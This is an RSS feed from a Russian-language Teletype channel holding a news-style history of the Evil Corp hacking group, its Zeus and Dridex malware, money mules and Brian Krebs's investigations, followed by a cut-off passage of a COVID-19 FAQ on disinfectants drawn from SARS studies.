<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>@redterror</title><generator>teletype.in</generator><description><![CDATA[@redterror]]></description><image><url>https://teletype.in/files/9b/9b01a44d-52c4-4d86-bdae-cf6e07c90ad8.jpeg</url><title>@redterror</title><link>https://teletype.in/@redterror</link></image><link>https://teletype.in/@redterror?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/redterror?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/redterror?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Thu, 16 Apr 2026 23:13:34 GMT</pubDate><lastBuildDate>Thu, 16 Apr 2026 23:13:34 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@redterror/ByDMs2BGU</guid><link>https://teletype.in/@redterror/ByDMs2BGU?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror</link><comments>https://teletype.in/@redterror/ByDMs2BGU?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror#comments</comments><dc:creator>redterror</dc:creator><title>Одиночка против корпорации зла</title><pubDate>Mon, 03 Feb 2020 15:23:58 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/20/2d/202d4177-904b-4bbc-96d6-10dd89cd5d92.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/20/2d/202d4177-904b-4bbc-96d6-10dd89cd5d92.png"></img>Нихау, бегущие в тенях! Привет, случайный подписчик.]]></description><content:encoded><![CDATA[
  <figure id="hWa9" class="m_column">
    <img src="https://teletype.in/files/20/2d/202d4177-904b-4bbc-96d6-10dd89cd5d92.png" width="1920" />
  </figure>
  <p id="a2cq"><strong>Нихау, бегущие в тенях! Привет, случайный подписчик.</strong></p>
  <p id="Va1H"><strong>Хакерскую группировку Evil Corp называют самой вредоносной и самой наглой среди киберпреступников. За сведения о ее членах американское правительство назначило награду в 5 миллионов долларов, а СМИ обсуждают слухи об их роскошном образе жизни и возможных связях с российскими спецслужбами. Мы постарались поподробнее разобраться в истории этой хакерской группы, образе действий и инструментах, с помощью которых она достигла своих сомнительных успехов и признания.</strong></p>
  <p id="BUoF"><strong>Поехали:</strong></p>
  <p id="vh3c"></p>
  <p id="5CRA">Главой Evil Corp называют Максима Якубца. Правоохранительные органы разных стран разыскивают его вот уже более десяти лет — еще в 2009 году он привлек к себе внимание, участвуя под ником aqua в краже денег из казны округа Буллитт, штат Кентукки. Об этом преступлении писали в газете Washington Post, с которой тогда сотрудничал в качестве эксперта по кибербезопасности <a href="https://xakep.ru/2014/02/18/62072/" target="_blank">Брайан Кребс</a>.</p>
  <figure id="aomi" class="m_column">
    <img src="https://st768.s3.eu-central-1.amazonaws.com/2dd0395a96e13189d9f1f3f0922e4b47/11040/aqua-on-dc.jpg#26844907" width="800" />
    <figcaption>Скриншот из архива Брайана Кребса с форума DirectConnections, на котором aqua в 2011 году делился опытом<br /></figcaption>
  </figure>
  <h3 id="r1RB">Криминальный зоопарк: денежные мулы и козлы отпущения.</h3>
  <p id="v73I">Уже тогда у хакеров была отработанная схема действий, в которой Максим Якубец отвечал за работу с «денежными мулами». Так называют людей, которые выводят деньги из банковской системы (где все переводы отслеживаются и могут быть отозваны), совершая необратимые транзакции. Традиционно для мошеннических схем использовалась система Western Union, но в последнее время набирает популярность криптовалюта Bitcoin.</p>
  <p id="ygj4"></p>
  <h3 id="rA94">Любопытный факт</h3>
  <p id="WsJG">Western Union фигурирует в качестве посредника в огромном числе историй с отмыванием денег, мошенничеством и даже финансированием терроризма. Иногда они платят штрафы — американскому правительству полмиллиарда долларов, ирландскому — полтора миллиона евро. Платят и продолжают работать, не обращая внимания на обвинения в «недостаточно тщательном отслеживании подозрительных транзакций». Почему им это сходит с рук? Никто не знает наверняка, но, возможно, это как-то связано с их чрезвычайно длительным и плодотворным сотрудничеством с американским правительством. Western Union работала над оборонными заказами, которые имеют отношение к созданию систем связи и управлению ими. Такие дела.</p>
  <p id="Qp7O">Многие люди становятся «мулами», совершенно не представляя, чем они занимаются на самом деле и каковы могут быть последствия их действий. В «схеме Якубца» в «мулы» вербовали на абсолютно легальных сайтах с вакансиями, обещая работу из дома от имени небольших, но солидно выглядящих компаний. Более того, для проверки работоспособности и надежности кандидатов им давали предварительные задания — например, исправить опечатки и грамматику в текстах, обещая заплатить по 8 долларов за килобайт. Текстами же были деловые письма — от лица подставной компании хакеров в адрес ее подрядчиков. Так что, когда людям приходило письмо с заданием совершить денежный перевод, оставив себе 5% от суммы в качестве оплаты, они не удивлялись и выполняли такое задание.</p>
  <p id="1dBI">Удивляться им, разумеется, приходилось потом, когда оказывалось, что теперь они должны всю сумму перевода какому-нибудь банку. Ведь банк всегда может отследить и отозвать ошибочные транзакции — и всегда найдет, с кого взыскать недостающее. Таким образом, финансовую ответственность за деятельность русских и украинских хакеров в итоге приходилось нести американским и европейским домохозяйкам и пенсионерам.</p>
  <p id="UG4E"></p>
  <h2 id="d0oP">Новички и ветераны: след Зевса с Олимпа киберпреступности</h2>
  <p id="1bgU">В истории с казной округа Буллитт двадцатидвухлетний Максим Якубец был тесно связан с Евгением Богачёвым — уже тогда чрезвычайно известным хакером, автором трояна Zeus. За поимку этого персонажа ФБР назначило почти столь же впечатляющую награду, как и за Якубца.</p>
  <figure id="RdQ9" class="m_column">
    <img src="https://st768.s3.eu-central-1.amazonaws.com/5383f1775866a73e217ade20b07f2e89/11033/bogachev.jpg#26844907" width="1200" />
    <figcaption>Ни одна статья с упоминанием Евгения Богачева не может обойтись без этого фото с бенгальской кошкой и другими атрибутами роскошной жизни<br /></figcaption>
  </figure>
  <p id="WBf8">Именно в связи с этим инцидентом о них и узнал Брайан Кребс. К тому моменту он уже давно был завсегдатаем открытых, полузакрытых и совсем закрытых хакерских форумов. Были у него и какие-то прямые источники, которые предоставляли ему информацию из переписки хакеров.</p>
  <p id="7tSC"></p>
  <h3 id="y6vo">Откуда дровишки?</h3>
  <p id="WBoi">Разумеется, как Кребс, так и ФБР не раскрывают подробностей своих расследований и источники информации. Но на сайте Кребса приводятся множественные куски из логов Jabber-переписки хакеров, и эта же переписка цитируется в документах ФБР как важное свидетельство. Переписка, разумеется, велась на русском (который Кребс, кстати, изучает уже больше пятнадцати лет) — но что на сайте Кребса, что в официальных документах ФБР она дана в переводе на английский. И судя по всему, у Кребса и ФБР этот перевод одинаковый (максимально связные предложения и тщательно переведенные русские ругательства).</p>
  <p id="yDkO">Что в переписке, что на форумах хакеры использовали одни и те же привычные никнеймы. Кребс утверждает, что такая небрежность в этих кругах встречается очень часто (что изрядно облегчает ему отслеживание «карьерного роста» интересующих его игроков на арене киберпреступности). Богачев был lucky12345 или slavik, а Якубец — aqua.</p>
  <p id="8r96"></p>
  <h3 id="frd2">Zeus</h3>
  <p id="Vdg6">Zeus — многокомпонентный банковский трой, насчитывающий множество модификаций. Основная функция заключается в краже паролей от банковских приложений, FTP-клиентов, других программ. Троян может выполнять поступающие с управляющего сервера команды, перехватывать вводимые пользователем в браузерах данные (кейлоггинг и формграббинг), красть файлы cookies, устанавливать в системе цифровые сертификаты и удалять их, блокировать доступ к заданным киберпреступниками интернет-ресурсам, подменять стартовую страницу в браузерах, загружать и запускать программы, а также удалять файлы на жестком диске.</p>
  <p id="UkDz">Хакеры не просто обсуждали покупку у Богачева «базовой версии» его трояна Zeus — они заказали ему модифицированную версию, Jabber Zeus, которая пересылала похищенную банковскую информацию по протоколу Jabber. Это позволяло злоумышленникам крайне оперативно планировать свои действия и управлять своей широко раскинутой сетью троянов — например, они могли получать Jabber-сообщения о том, что какая-то из их потенциальных жертв пополнила свой банковский счет.</p>
  <figure id="xGGh" class="m_column">
    <img src="https://st768.s3.eu-central-1.amazonaws.com/2dd0395a96e13189d9f1f3f0922e4b47/11042/maza-zeus.jpg#26844907" width="800" />
    <figcaption>На форуме Mazafaka обсуждают применение стандартной версии Zeus, которой Богачев широко торговал<br /></figcaption>
  </figure>
  <p id="yFTi">Якубец очень гордился сотрудничеством с Богачевым и их оригинальной идеей, в сравнении с которой все остальные пользователи Zeus выглядели новичками. Но пресс-релиз ФБР сообщает крайне интересные подробности расследования, из которых следует, что именно использование Jabber-протокола и подвело хакерскую группу, а для Максима Якубца, возможно, именно это событие сыграло важную роль в его судьбе.</p>
  <p id="9wIy"></p>
  <h2 id="fpEl">Jabber-болтун — находка для шпиона</h2>
  <p id="wLqq">Следи за руками: сейчас мы расскажем, как расследуют киберпреступления! А также ты узнаешь, как множество мелких недочетов складываются в большие проблемы.</p>
  <p id="rLZR">Итак, новая версия трояна пересылает различную банковскую информацию (логины, одноразовые пароли, PIN-коды, журналы кейлоггеров) по протоколу Jabber. Этот протокол — децентрализованный, любой человек может поднять свой собственный сервер. Анализ зараженных компьютеров показал, что все они отправляют сообщения на один сервер на домене incomeet.com.</p>
  <p id="ch3b">Дальше ФБР выяснило, что этот домен хостится на сервере, принадлежащем обычной компании-хостеру. И что офис этой компании располагается в Нью-Йорке. После чего, разумеется, им не составило труда изъять сервер и хорошенько изучить его. На сервере осталось огромное число логов — и не только технических сообщений трояна, но и обычной переписки! Оказалось, что хакеры использовали свой Jabber-сервер в том числе и для координации действий, и для простой болтовни.</p>
  <p id="euTJ">Конец немного предсказуем. В логах переписки нашлось и обсуждение той самой статьи Брайана Кребса в Washington Post (то есть прямое признание в совершенных преступлениях), и никнеймы, которые хакеры использовали как в чате, так и на форумах.</p>
  <p id="vQ4p">Справедливости ради надо сказать, что хакеры стремились свести к минимуму обсуждение личной информации. Но следователи постарались и смогли найти зацепки. Лучшей их зацепкой стал эпизод, когда хакеры обсуждали альтернативные способы связи — и aqua (то есть Якубец) попросил скинуть ему номер телефона своего сообщника письмом на электронную почту. После чего сообщил адрес почты на mail.ru.</p>
  <p id="eGYB">На дворе стоял июль 2009 года. Отношения между США и Российской Федерацией были сравнительно теплыми, практиковалось в том числе и сотрудничество правоохранительных органов. ФБР обратилось за помощью к российским коллегам — и получило ее.</p>
  <p id="NidT">Российские правоохранительные органы передали ФБР краткие, но весьма информативные сводки, из которых следует, что в компании Mail.ru активно с ними сотрудничали. Выяснилось, что на указанный адрес приходили как письма для хакера aqua (с предложением написать вирус), так и для человека по имени Максим Якубец — который покупал билеты в турагентстве и заказывал доставку детской коляски на определенный адрес в Москве.</p>
  <p id="oXQu">После этого, разумеется, по установленному адресу последовал визит силовиков и обыск. Американским коллегам вежливо сообщили, что в данной квартире действительно был обнаружен некий Максим Якубец, а также женщина, личные данные которой тоже любезно передали в ФБР.</p>
  <p id="ZalS">На этом список любезностей закончился. С американской стороны, впрочем, на этом работа не завершилась — они продолжили копать, чтобы собрать побольше убедительных доказательств. Потребовав сотрудничества от Microsoft, ФБР отыскало Skype-аккаунт, зарегистрированный на тот же email с Mail.ru и на имя Максим Я. В списке контактов этого аккаунта обнаружилась женщина, в которой смогли установить ту самую особу, присутствовавшую в квартире во время обыска.</p>
  <p id="THnq">Эта же самая женщина несколько раз подавала заявление на получение американской визы. Судя по всему, ее въезду в страну не препятствовали, но скрупулезно вели досье, обращая внимание на изменение брачного статуса с замужней на разведенную, на смену фамилии и на отчество ребенка, которого она в 2012 году везла с собой в США. Многочисленные детали, включая домашний адрес ребенка и совпадение даты его рождения с сообщением из чата хакеров, в котором aqua хвастался, что стал отцом, позволили ФБР удостовериться, что речь идет о первой жене и ребенке Якубца.</p>
  <p id="ksAr">Вот только никакого практического смысла в этом не было. Якубец (как и Богачев и многие другие разыскиваемые хакеры) за границу России выезжать не собирался. А Россия не собиралась его выдавать.</p>
  <p id="vApq">Если слухи о том, что талантливым хакерам в России рано или поздно делают «предложение, от которого невозможно отказаться», верны, то можно предположить, что визит силовиков и обыск в квартире изменил жизнь Максима Якубца только к лучшему.</p>
  <p id="ARDd"></p>
  <h3 id="UCRb">Dridex</h3>
  <p id="Issr">Dridex — многокомпонентный банковский бот, имеющий множество версий. Архитектура троя подразумевает наличие набора модулей, каждый из которых несет свою функциональную нагрузку. Для связи с управляющим сервером большинство редакций Dridex использует P2P-протокол, ботнет децентрализованный и одноранговый, что затрудняет вмешательство в его работу и перехват управления. Данные, которыми бот обменивается с управляющим сервером, шифруются.</p>
  <p id="CIUh">В процессе работы Dridex встраивается в проводник или процессы браузеров и далее выполняется в контексте этих приложений. По команде злоумышленников трой может устраивать веб-инжекты, перехватывать вводимые пользователем данные (кейлоггинг и формграббинг), красть пароли, выполнять поступающие команды и похищать конфиденциальную информацию на зараженной машине.</p>
  <p id="Jdn7">К 2011 году Якубец собрал свою собственную хакерскую группировку, построенную вокруг нового трояна Dridex (также известного как Bugat и Cridex). ФБР считает, что именно Якубец был разработчиком и главным распространителем трояна, а также координатором сети денежных мулов. Дела у них шли, разумеется, не всегда ровно — но в <a href="https://www.justice.gov/opa/press-release/file/1223586/download" target="_blank">обвинительном заключении</a> ФБР указываются разовые хищения сумм в миллион долларов и больше.</p>
  <figure id="6s3k" class="m_column">
    <img src="https://st768.s3.eu-central-1.amazonaws.com/5383f1775866a73e217ade20b07f2e89/11036/turashev-yakubets.jpg#26844907" width="1200" />
    <figcaption>Главные лица Evil Corp — Игорь Турашев и Максим Якубец<br /></figcaption>
  </figure>
  <p id="mrkG">Эти деньги Якубец и его сообщники тратили на дорогие машины и прочие предметы роскоши, прожигая жизнь в стиле миллионеров-плейбоев. Подобный образ жизни позволил Якубцу войти в узкий круг московской «золотой молодежи», где он встретил свою вторую жену — Алену Бендерскую. С ней он отдыхал на самом дорогом курорте Крыма и в 2017 году сыграл свадьбу.</p>
  <figure id="irRB" class="m_custom">
    <img src="https://st768.s3.eu-central-1.amazonaws.com/5383f1775866a73e217ade20b07f2e89/11029/alena.jpg#26844907" width="677" />
    <figcaption>Алена Бендерская, жена Максима Якубца<br /></figcaption>
  </figure>
  <p id="SpIR">Но, помимо счастья в личной жизни, новый брак принес с собой и чрезвычайно полезные связи. Не то чтобы у Якубца их совсем не было — судя по всему, в его группировке Evil Corp <a href="https://www.svoboda.org/a/30314282.html" target="_blank">состоял</a> <a href="https://telegra.ph/Sapogi-za-polmilliona-Lambordzhini-i-zolotaya-santehnika-roskoshnaya-zhizn-detej-ehks-mehra-Himok-02-28" target="_blank">сын бывшего мэра Химок Владимира Стрельченко</a>.</p>
  <p id="ur8i">Однако женитьба на Алене Бендерской сделала Якубца родственником еще более влиятельного человека по имени Эдуард Бендерский, бывшего спецназовца ФСБ и президента благотворительного фонда бывших силовиков «Вымпел». По сведениям американцев, в год свадьбы Якубец уже совершенно точно сотрудничал с ФСБ, а в 2018 году получил лицензию на работу со сведениями, составляющими государственную тайну.</p>
  <figure id="oUPJ" class="m_column">
    <img src="https://st768.s3.eu-central-1.amazonaws.com/5383f1775866a73e217ade20b07f2e89/11034/marriage.jpg#26844907" width="780" />
    <figcaption>Кадр из свадебного видео Максима и Алены — жениха все время снимают, не показывая лица, а само видео пытались вычистить из Сети — но не преуспели<br /></figcaption>
  </figure>
  <p id="t014"></p>
  <h3 id="IFSl">WWW</h3>
  <p id="5TN6">Если тебе интересно более подробно узнать о связях хакеров из Evil Corp с разными влиятельными людьми и о том, кто эти люди и чем они занимаются, то в русскоязычной прессе есть несколько расследований на эту тему. Начать можно с <a href="https://meduza.io/feature/2019/12/11/ruchnye-hakery-ekstravagantnye-millionery" target="_blank">материала «Медузы»</a>. Подробнее почитать об Эдуарде Бендерском, его семье и репутации крайне авторитетного охотника можно <a href="https://www.svoboda.org/a/30315952.html" target="_blank">здесь</a>.</p>
  <p id="qWE2">И вот еще подборка материалов о связях этих людей с организованной преступностью: <a href="https://www.svoboda.org/a/30340065.html" target="_blank">1</a>, <a href="https://rucriminal.info/ru/material/sledy-evil-corp-doveli-do-dmitriya-zelenina" target="_blank">2</a>, <a href="https://rucriminal.info/ru/material/kto-stoit-za-xakerom-1?hl=evil" target="_blank">3</a>, <a href="https://rucriminal.info/ru/material/evil-corp-i-marina-sechina" target="_blank">4</a>.</p>
  <p id="OGae"></p>
  <h2 id="B2i6">Успехи одинокого стрелка</h2>
  <p id="ZY7C">Расследование ФБР, связи с российскими силовиками, миллионы украденных долларов — все это чрезвычайно масштабные истории, затрагивающие множество людей. Но история эксперта-одиночки Брайана Кребса стоит особняком, потому что ему удалось сделать кое-что, с чем ФБР не справилось.</p>
  <p id="kSrJ">Его таинственные источники дали ему информацию о деталях схемы по работе с денежными мулами, которую использовал Якубец. Чтобы выводить деньги из США, нужно было достаточное количество «мулов» и возможность оперативно с ними связываться, выдавать им указания и получать от них их личные и банковские данные. И так как многие «мулы» были людьми с невысоким уровнем компьютерной грамотности, этот способ связи должен быть достаточно простым в использовании.</p>
  <p id="IKgY">Решением Якубца стало создание системы сайтов, напоминавших корпоративные порталы управления персоналом — с профилями сотрудников и рассылкой сообщений, выглядевших настолько убедительно, чтобы люди искренне верили, что работают на легальный, профессиональный бизнес.</p>
  <figure id="YgX5" class="m_column">
    <img src="https://st768.s3.eu-central-1.amazonaws.com/2dd0395a96e13189d9f1f3f0922e4b47/11043/westernco.jpg#26844907" width="1127" />
    <figcaption>Общий вид сайта для работы с «мулами»<br /></figcaption>
  </figure>
  <p id="xsiP">Однако во всей этой системе был один изъян. Любой человек, получивший ссылку на сайт, мог на нем зарегистрироваться — и более того, просто меняя номер сообщения в адресной строке, пользователь сайта получал возможность читать сообщения, предназначенные для других пользователей!</p>
  <figure id="wSvY" class="m_column">
    <img src="https://st768.s3.eu-central-1.amazonaws.com/2dd0395a96e13189d9f1f3f0922e4b47/11041/avcompanybackoffice.jpg#26844907" width="912" />
    <figcaption>Форма входа на один из таких сайтов<br /></figcaption>
  </figure>
  <p id="7tOv">И Брайан Кребс несколько лет подряд именно этим и занимался. Каждое утро он заваривал себе кофе и садился читать переписку за последние сутки, в которой «денежным мулам» писали: «Доброе утро, %username! Сегодня наш клиент переведет вам деньги, после перевода снимите их наличными в своем банке и перешлите нам».</p>
  <figure id="8PAh" class="m_column">
    <img src="https://st768.s3.eu-central-1.amazonaws.com/2dd0395a96e13189d9f1f3f0922e4b47/11039/amr-co.jpg#26844907" width="1089" />
    <figcaption>Личные сообщения для мулов<br /></figcaption>
  </figure>
  <p id="PEo4">Разумеется, «клиентами» были очередные жертвы — в основном представители малого бизнеса с плохо налаженной кибербезопасностью. Но Брайан Кребс оказывался последним рубежом их обороны. Он гуглил по названию компании из хакерских писем, находил их телефон и сообщал, что фирму прямо сейчас грабят русские хакеры.</p>
  <p id="zb6Y">«Вы, скорее всего, меня не знаете, но вот вам мой сайт с информацией о том, кто я и что я делаю. Ваши зарплатные счета взломали, и вы можете потерять существенную сумму денег. Вам стоит немедленно позвонить в ваш банк и заморозить любые переводы в процессе оформления, пока еще не слишком поздно. Потом вы можете позвонить мне и расспросить меня о том, как я все это узнал, — но сейчас, пожалуйста, позвоните в ваш банк», — писал пострадавшим Брайан.</p>
  <p id="bv2B">Таким образом порой Брайану Кребсу удавалось предотвратить преступление прямо во время его совершения и избавить небольшие фирмы от серьезных проблем. Но порой, разумеется, ему не верили — и Брайану приходилось беседовать с полицейскими или агентами ФБР. Впрочем, разговор с правоохранительными органами у него обычно получался коротким: он независимый исследователь, обвинить его не в чем, а полиции он не боится, даже может прочитать простому полицейскому лекцию о киберпреступности или привлечь внимание ФБР к серии преступлений, которые иначе агентство еще долго не замечало бы из-за малого масштаба жертв.</p>
  <p id="QLr8">Частенько Брайану уже приходилось вступать в напряженные беседы с представителями власти или корпораций, когда те просили его задержать выход очередного расследования или и вовсе не публиковать его в интересах следствия или бизнеса. Но Кребс <a href="https://www.reddit.com/r/netsec/comments/3psice/im_an_investigative_reporter_ama/" target="_blank">в своем онлайн-интервью на Reddit</a> утверждает, что правоохранительные органы ограничивались лишь вежливыми просьбами, в исполнении которых он не видел для себя никакой выгоды. А с корпорациями он и вовсе не намерен сотрудничать. Примером твердости его убеждений может служить история с сайтом знакомств Ashley Madison, представители которого сначала обещали ему денег за молчание, а после выхода статьи — <a href="https://xakep.ru/2015/09/14/bhatia-vs-krebs/" target="_blank">грозили</a> судом.</p>
  <p id="fMwn">Так что Брайан Кребс не останавливается в своих расследованиях, хоть и прекрасно знает, что хакеры тоже читают его блог, обсуждают его статьи, радуются разрыву контракта с Washington Post и даже пытаются подбросить ему наркотики через интернет. Известность — дело непростое: Кребс пишет, что однажды он захотел зарегистрироваться на очередном хакерском форуме под своим настоящим именем, но админ принял его никнейм за шутку. А на другом форуме такой никнейм уже был занят каким-то крупным спецом по воровству номеров кредиток.</p>
  <p id="FnT6">Можно было бы предположить, что своими публикациями Кребс осложняет жизнь в первую очередь самому себе. Но практика показывает, что это не так. Публикации в американском блоге могут заставить хакеров поволноваться или возгордиться, но, скорее всего, не изменят их образа действий. В крайнем случае они попробуют сменить никнейм на форуме — но за ними все равно останется хвост из их старых постов, следов прошлых подвигов и характерный почерк. Все эти материалы Кребс тщательно собирает в свой архив, с помощью которого он и проводит столь впечатляющие расследования.</p>
  <p id="8cWQ"><strong>Но в конечном счете, пока между США и Российской Федерацией нет соглашений о сотрудничестве правоохранительных органов и экстрадиции преступников, хакерам мало что угрожает, пока они не покидают границ России.</strong></p>
  <p id="dlqt">Кребс много пишет о том, что с киберпреступностью нужно бороться в первую очередь за счет разумных практик кибербезопасности и широкого распространения информации. Что в современном мире в «денежные мулы» могут завербовать двенадцатилетнего ребенка и семидесятилетнюю пенсионерку — если кто-то не объяснит им, что бесплатный сыр бывает только в мышеловке.</p>
  <p id="WM2d"></p>
  <h2 id="3ES4">Вместо послесловия</h2>
  <p id="VCWC">Из этих захватывающих историй следуют довольно банальные выводы. Внимательность и наблюдательность — как в случае с Брайаном Кребсом, годами собирающим свои архивы и отслеживающим связи одних хакерских атак с другими, — вознаграждается, и сыщик-одиночка получает шанс предотвратить преступление, которое ФБР может лишь расследовать постфактум.</p>
  <p id="sbul">Беспечность же в вопросах безопасности вредит и бизнесменам, которые не доверяют сигналам тревоги «Вас грабят прямо сейчас!», и хакерам, смешивающим на одном сервере личную переписку с управляющими командами ботнета. Вредит она и простым людям, купившимся на обещания легких денег в интернете.</p>
  <p id="kCf6">А насчет спецслужб, невест со связями и бенгальских кошек — делай выводы сам. Но старайся при этом соблюдать закон — пусть примером тебе будет слава не Максима Якубца, а Брайана Кребса.</p>
  <p id="jx4I"></p>
  <p id="B1tK"><strong>На этом всё, тени. Помните, киберсталкеры, безопасность, сука, решает! Оставайтесь с нами, активнее подписывайтесь на наш канал, заходите в гости почаще и приглашайте друзей: <a href="https://t.me/joinchat/AAAAAEWEtm5wXT-zx05Y1w" target="_blank">https://t.me/joinchat/AAAAAEWEtm5wXT-zx05Y1w</a></strong></p>
  <p id="5cB8"><strong>Поддержать хактивизм и канал ShadowRun: </strong>327J5WozmU3MTqfDoWvgDoo5NqvimyYCRS (BTC)</p>
  <p id="TpI8">M89UUZaZuXVsGD7LRgFKMDoUM8gd6uTJ3e (LTC)</p>
  <p id="aKvd">0x8f08DaC4d273fC6968283aad70a6677dD9f57642 (ETH)</p>
  <p id="yTLh">P64050430 (Rub Payeer)</p>
  <figure id="9VXm" class="m_column">
    <img src="https://telegra.ph/file/7db79291c5554231916bd.jpg" width="1200" />
  </figure>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@redterror/HkaxCsEfL</guid><link>https://teletype.in/@redterror/HkaxCsEfL?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror</link><comments>https://teletype.in/@redterror/HkaxCsEfL?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror#comments</comments><dc:creator>redterror</dc:creator><title>Коронавирус 2019-nCoV. Shadow FAQ по защите органов дыхания и дезинфекции</title><pubDate>Sun, 02 Feb 2020 20:15:48 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/75/26/752697cf-e84c-4dc9-bf10-15df55dda0ce.jpeg"></media:content><description><![CDATA[<img src="https://teletype.in/files/75/26/752697cf-e84c-4dc9-bf10-15df55dda0ce.jpeg"></img>Нихау, бегущие в тенях! Привет, случайный подписчик.]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/75/26/752697cf-e84c-4dc9-bf10-15df55dda0ce.jpeg" width="1280" />
    <figcaption>https://t.me/shadowruntime</figcaption>
  </figure>
  <p><strong>Нихау, бегущие в тенях! Привет, случайный подписчик.</strong></p>
  <p><strong>Китайский коронавирус, он же «пневмония Уханя» на неделе стал одной из самых горячих тем. В классической дилемме «кто виноват и что делать?» нас, традиционно, волнует только вторая часть. Сегодня под катом — статья про дезинфекцию, маски и обеззараживание помещений. Кидаем в &quot;<a href="https://t.me/shadowruntime" target="_blank">Избранное</a>&quot; и шлем друзьям!</strong></p>
  <p><strong>Поехали:</strong></p>
  <p>Сразу оговорюсь, что из-за относительной новизны 2019-nCoV, ждать каких-либо исследований рано, все что остается — апеллировать к старым наработкам, полученных во времена борьбы сначала с SARS, а потом и с MERS, ведь одно семейство, как ни крути…</p>
  <p></p>
  <h2>I. Руки + поверхности</h2>
  <p>В общем, по поводу обеззараживания руки/поверхностей с помощью химических дезинфектантов мы нашл интересную <a href="https://moh-it.pure.elsevier.com/en/publications/sars-cov-influenza-a-and-syncitial-respiratory-virus-resistance-a" target="_blank">статью</a>, где авторы сравнили вирулицидную активность следующих распространенных химикатов:</p>
  <p>– Гипохлорит натрия 0.01% – 0.05% – 0.1%;</p>
  <p>– Этанол 70%;</p>
  <p>– Бензалкония хлорид 1%;</p>
  <p>– Хлоргексидин биглюконат 1%;</p>
  <p>– 2-бензил-хлорфенол 2%;</p>
  <p>– Надуксусная кислота 0.035%.</p>
  <p>ВОЗ-ские изыскания по поводу SARS-коронавируса показывают, что вирус выживает до 48 часов на пластиковых поверхностях и до 4 дней в жидких средах. Но в случае применения любого из дезинфектантов активность вируса снижается очень и очень быстро. В упомянутой статье показано, что коронавирус SARS полностью инактивируется такими дезинфицирующими средствами, как надуксусная кислота, этанол 70%, гипохлорит натрия 0,05% и 0,1%, хлоргексидин биглюконат 1% и 2-бензил-хлорфенол 2% уже после обработки в течении 1 минуты. Для бензалкония требуется время подольше.</p>
  <p>Правда что касается биологических отходов (мокрота, выделения человека и т.п.), то способность к разрушению вирусной РНК показали только 0,1% гипохлорит натрия и 2% 2-бензил-хлорфенол при времени контакта более 2-х минут.</p>
  <p></p>
  <p><strong>В более позднем<a href="https://europepmc.org/article/med/15923059" target="_blank"> исследовании </a>для проверки вирулицидной активности использовались четыре различных обеззараживателя рук:</strong></p>
  <p>1) на основе 45% изопропанола, 30% н-пропанола и 0,2% мезетрония этилсульфата;</p>
  <p>2) на основе на 80% этанола;</p>
  <p>3) гель на основе 85% этанола;</p>
  <p>4) антивирусный гель на основе 95% этанола — время обработки рук = 30 секунд. </p>
  <p><strong>В качестве дезинфектантов для поверхностей использовали средства:</strong></p>
  <p>1) на основе хлорида бензалкония и лауриламина;</p>
  <p>2) на основе хлорида бензалкония, глутаральдегида и дидецилдимония хлорида;</p>
  <p>3) на основе моноперфталата магния. Время обработки — от 15 до 60 минут. В результате было установлено, что SARS-CoV инактивировался до уровня ниже предела обнаружения в случае обработки любым из указанных препаратов. Это значит, что в качестве обеззараживателя (как рук, так и поверхностей) можно использовать любые средства, содержащие выше упомянутые компоненты.</p>
  <p></p>
  <p><u><strong>Примечание насчет используемого спирта.</strong></u></p>
  <p>Традиционно в спиртовых обеззараживателях для рук используются смеси из изопропилового спирта, этанола (этилового спирта) или n-пропанола в различных концентрациях. Наиболее эффективны варианты содержащие от 60 до 95% алкоголя. Здесь следует учитывать, что на вирусы лучше всего действуют спирты over 90%. Изопропиловый спирт <a href="https://www.ncbi.nlm.nih.gov/pubmed/15912075" target="_blank">убивает </a>99,99% или более всех не образующих спор бактерий менее чем за 30 секунд. Спиртовые дезинфицирующие средства, содержащие не менее 70% спирта (чаще всего этанол), убивают 99,9% бактерий на руках через 30 секунд после нанесения и от 99,99% до 99,999% за одну минуту. Что касается эффективности применения для уничтожения коронавируса (SARS как самого старого), то здесь <a href="https://www.ncbi.nlm.nih.gov/pubmed/15118911/" target="_blank">такая вот </a>картина:</p>
  <figure class="m_column">
    <img src="https://habrastorage.org/webt/7e/r8/4x/7er84xpqssc5n1dpeqoyyqic0t4.jpeg" width="1260" />
  </figure>
  <p>Минимальный фактор снижения титра (log10) = десятичный логарифм отношения между общим количеством вирусов перед обработкой и общим количеством после обработки, т.е. фактически показатель эффективности обеззараживания. (<a href="https://t.me/shadowruntime" target="_blank">https://t.me/shadowruntime)</a></p>
  <p>В целом, если рассмотреть доступные варианты, то изопропиловый спирт <a href="https://www.ncbi.nlm.nih.gov/pmc/articles/PMC88911/" target="_blank">считается </a>более эффективным против бактерий, а этиловый спирт более эффективен против вирусов, однако это зависит как от концентраций дезинфицирующего агента, так и от обрабатываемого микроорганизма (например, изопропиловый спирт более липофилен чем этиловый, поэтому менее активен в отношении гидрофильных вирусов (<a href="https://ru.wikipedia.org/wiki/%D0%9F%D0%BE%D0%BB%D0%B8%D0%BE%D0%B2%D0%B8%D1%80%D1%83%D1%81" target="_blank">вирус полиомиелита </a>и т.п.)</p>
  <p></p>
  <h3><u>Важно.</u></h3>
